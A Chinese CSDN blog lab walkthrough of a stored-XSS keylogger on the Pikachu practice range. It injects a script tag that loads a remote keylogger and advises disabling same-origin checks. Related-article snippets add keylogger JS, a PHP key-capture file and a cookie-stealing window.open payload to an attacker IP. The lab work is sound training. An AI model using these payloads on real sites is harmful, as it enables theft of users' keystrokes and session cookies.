XSS漏洞利用---键盘记录

最新推荐文章于 2024-06-24 09:00:00 发布
最新推荐文章于 2024-06-24 09:00:00 发布
阅读量461 收藏
点赞数
分类专栏: web 安全 文章标签: xss web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ethan024/article/details/114749146
版权
安全 同时被 2 个专栏收录
39 篇文章 0 订阅
订阅专栏
web
37 篇文章 0 订阅
订阅专栏

存储型XSS漏洞之钓鱼

实验准备:

  1. 皮卡丘靶场;
  2. 存在存储型xss漏洞的网页;
  3. pkxss键盘记录后台;

实验步骤:

  1. 嵌入恶意的js标签<script src="http://localhost/pikaqiu.cn/pkxss/rkeypress/rk.js"></script>
    在这里插入图片描述2. 在输入框中输入字符串:111111并查看后台,发现已经记录。
    在这里插入图片描述在这里插入图片描述
    Tips: 如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin.
汉堡哥哥27
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1390
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
XSS跨站脚本攻击:获取键盘记录
jklbnm12的博客
01-20 776
将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。 登入下      默认没任何数据 1.1 GET型XSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没
xss-键盘记录
weixin_46164380的博客
03-08 219
开启liunx的apache服务。 /etc/init.d/apache2 start 在/var/www/html下面创建三个文件 keylogger.js document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if...
7.XSS获取键盘记录(存储型xss)
最新发布
愿听风成曲
06-24 408
协议 子域名 主域名 端口 资源地址当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域我们把不同的域之间请求数据的操作,成为跨域操作。跨域-同源策略而为了安全考虑,所有的浏览器都约定了“同源策略”,同源策略规定,两个不同域名之间不能使用JS进行相互操作。比如:x.com域名下的javascrip并不能操作y.com域下的对象。如果想要跨域操作,则需要管理员进行特殊的配置。
XSS键盘记录和cookie获取
Williamanddog的博客
01-26 1815
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1039
在实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
xss漏洞利用
icecream_sheep的博客
11-15 1644
首先,我们先在文件夹找到www命名的文件夹里的html文件夹,在里面创建一个hack.php文件,输入这段代码, 然后,再创建一个submit.php文件 然后,打开一个浏览器访问 192.168.xx.xxx(你的虚拟机的IP)/submit.php,然后进入到这个界面 在这个界面输入"/><script>window.open("http://(填入你的IP)/hack.php?cookie="+document.cookie);</script&...
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5628
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
86.网络安全渗透测试—[常规漏洞挖掘与利用篇2]—[xss漏洞利用平台-搭建与测试]
qwsn
01-24 2920
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞利用平台-搭建与测试 1、详细说明 2、下载地址 3、搭建过程 4、测试模块:`基础认证钓鱼`【总是失败】 5、测试默认模块:`窃取cookie`【成功】 6、安装其他模块 7、测试模块:`获取内网 ip`【时好时坏】 8、测试模块:`键盘记录器`【成功】 9、测试模块:`html5截屏`【失败】 10、测试模块:`获取xss02.php页面源码`【成功】 11、总结
kali渗透学习-Web渗透XSS(二)漏洞利用-键盘记录器,xsser
weixin_43239236的博客
01-23 459
原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 反射型漏洞利用 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali    客户端 启动apache2服务:service apache2 start 语法: <script src="http://192.168.1.127/keylogger.js"></script> keylogger.js 键盘记录器 需要修改里面的接受地址 document.onkeypress = function(ev
XSS漏洞简单概述--UGa
qq_52781120的博客
03-20 468
XSS漏洞简单概述–UGa 个人笔记向,请多指点 *简介 XSS作为OWASP TOP 10之一,XSS被称为跨站脚本攻击(Cross-site scripting) ,本来应该缩写为CSS,但是由于和CSS (Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS可以非常灵活的操作html、css和浏览器,这使得XSS攻击的“想象”空间特别大。 XSS通过将精心构造的代码(J
利用XSS实现受害者的键盘记录
weixin_51356351的博客
11-17 255
实验环境: PHPstudy DVWA靶场 实验步骤: 1、在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将输入限制值改的大一点 4、将 <scri
web渗透测试-从入门到放弃-04XSS-键盘记录
lx1315998513的博客
12-15 365
案例-xss键盘记录 1.在实验前,先了解一下什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 下面的地址同源吗?...
pikachu之xss获取键盘记录
2301_80661529的博客
02-28 702
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!
漏洞复现篇——利用XSS漏洞实现键盘记录
爱国小白帽
02-21 1789
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场 实验准备: 在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key); } ?> 模拟实验...
XSS获取键盘记录练习
weixin_44720762的博客
05-03 1142
在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。 因为相关知识的练习性,先对部分名词含义进行说明。 跨域: URL(统一资源定位符)中有 协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。 同源策略:同源策略(Same or...
xss获取键盘记录实验演示
qq_42764906的博客
04-23 280
在实验开始之前我们需要了解几个概念 在此之前把如图的位置改为自己pkxss的网址 检查如图的代码是否有 或者有没有没注释掉 在存储型xss输入 之后在键盘上敲aaaaaa 得到 如图 ...
HTML事件中的XSS漏洞解析-01
"Web攻防训练营——第六节 HTML事件中的XSS-01" 在Web安全领域,跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的安全漏洞,它允许攻击者在用户的浏览器上注入恶意脚本。本节主要探讨了HTML事件中的XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

汉堡哥哥27

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值